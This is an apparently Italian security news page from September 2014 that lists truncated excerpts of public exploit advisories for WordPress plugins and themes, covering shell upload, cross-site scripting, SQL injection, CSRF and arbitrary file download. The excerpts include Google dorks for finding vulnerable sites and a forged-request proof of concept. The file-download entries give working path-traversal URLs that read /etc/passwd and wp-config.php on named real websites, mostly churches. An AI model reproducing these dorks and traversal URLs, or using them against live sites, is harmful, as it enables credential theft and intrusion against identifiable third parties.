WordPress Slideshow Gallery 1.4.6 Shell Upload

16 settembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it
#
#
# Disclaimer:
#
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
#
#
# Requirements:
#
# 1) Enabled user management...

Leggi il seguito »

WordPress Photo Album Plus 5.4.4 Cross Site Scripting

15 settembre 2014 - Fonte: http://www.mondounix.com
WP Photo Album Plus Security Vulnerabilities
 
Author: Milhouse 
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus
 
Set up:
Wordpress Version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: FireFox 31, Internet Explorer 8-11
 
Issue number 1: A Cross-Site Scripting (reflective) vulnerability.
Details:
The plugin echoes the value of  the http header “User-Agent” back to the client browser. Allowing un-sanitized java script to be inserted. 
 
Severity: Low
 
Proof of Concept (POC):
Request:
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent:...

Leggi il seguito »

WordPress Plugin Vulnerability Dump – Part 2

10 settembre 2014 - Fonte: http://www.mondounix.com
More vulnerabilities in poorly coded plugins for y'all.
 
Ninja Forms v2.77 - Authorization bypass (regular users can delete forms, etc)
Contact Form v3.83 - Email header injection
WP to Twitter v2.9.3 - Authorization bypass (regular users can tweet to the admin's twitter account)
Xhanch - My Twitter v2.7.7 - CSRF (create and delete tweets)
TinyMCE Advanced v4.1 - (insignificant) CSRF
W3 Total Cache v0.9.4 - (minor) CSRF
WordPress Download Manager v2.6.92 - Authorization bypass (regular users can upload/delete arbitrary files, yes, even 
php files)
Wordfence Security v5.2.2 - Stored XSS
 
Details and POCs located: https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
 
More to follow.
 
-Voxel...

Leggi il seguito »

WordPress Spider Facebook 1.0.8 SQL Injection

9 settembre 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
 
# Date : 2014-08-25
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
# Location :  
http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php
 
######################
 
# Vulnerable code :
 
function Spider_Facebook_manage()
{
        require_once("facebook_manager.php");
        require_once("facbook_manager.html.php");
...

Leggi il seguito »

WordPress Like Dislike Counter 1.2.3 SQL Injection

9 settembre 2014 - Fonte: http://www.mondounix.com
#################################################################################################
#
# Title                : Wordpress Like Dislike Counter Plugin SQL Injection Vulnerability
# Risk                 : High+/Critical
# Exploit Author       : XroGuE
# Google Dork          : inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php  AND  plugins/pro-like-dislike-counter/ldc-ajax-counter.php
# Plugin Version       : 1.2.3
# Plugin Name          : Like Dislike Counter
# Plugin Download Link : http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip
# Vendor Home          : www.wpfruits.com
# Date                 : 2014/09/05
# Tested in            : Win7 - Linux
#
##################################################################################################
#...

Leggi il seguito »

WordPress Bulk Delete Users By Email 1.0 CSRF

9 settembre 2014 - Fonte: http://www.mondounix.com
# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 - CSRF
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage - http://www.speakdigital.co.uk/
# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/
# Version: 1.0
# Tested on: PHP
 
 
Description:
This plugin will allow administrator to delete user(s) account by entering
their email address.
 
Proof of Concept
1. Force the administrator to send below request:
 
URL :
http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php
METHOD : POST
REQUEST : de-text=<victim email>&submit=Search+and+Delete
 
* As the result,...

Leggi il seguito »

WordPress Urban City Arbitrary File Download

9 settembre 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress urban city Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/urbancity
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : https://churchthemes.net/themes/urban-city/
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.nlbcministries.org/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
www.colonialhills.com/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://iccpaix.org/wpblog/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://praisecovenant.net/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*]...

Leggi il seguito »

WordPress Epic Arbitrary File Download

9 settembre 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress epic theme Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/epic
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://www.organizedthemes.com/epic
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/epic/includes/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.lagunabaptist.org/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php
|
|[*]
http://doveetown.org/wp-content/themes/epic/includes/download.php?file=/home/content/03/10398303/html/wp-config.php
|
|[*]
http://verdebaptist.com/wp/wp-content/themes/epic/includes/download.php?file=/home/content/44/2981244/html/wp/wp-config.php
|
|[*]
http://kespres.ca/wp-content/themes/epic/includes/download.php?file=/home/content/30/10806230/html/wp-config.php
|
|[*]
http://kimberlywilliamsministries.org/wp-content/themes/epic/includes/download.php?file=/home2/praise11/public_html/wp-config.php
|
|-------------------------------------------------------------------------|
|[*]...

Leggi il seguito »

WordPress Authentic Arbitrary File Download

9 settembre 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress Authentic Theme Arbitrary File Download  
Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/authentic
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://www.organizedthemes.com/authentic-theme
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|-------------------------------------------------------------------------|
|[*]...

Leggi il seguito »

WordPress Antioch Arbitrary File Download

9 settembre 2014 - Fonte: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress Antioch Theme Arbitrary File Download  
Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/antioch
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://churchthemes.net/themes/antioch
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|-------------------------------------------------------------------------|
|[*]...

Leggi il seguito »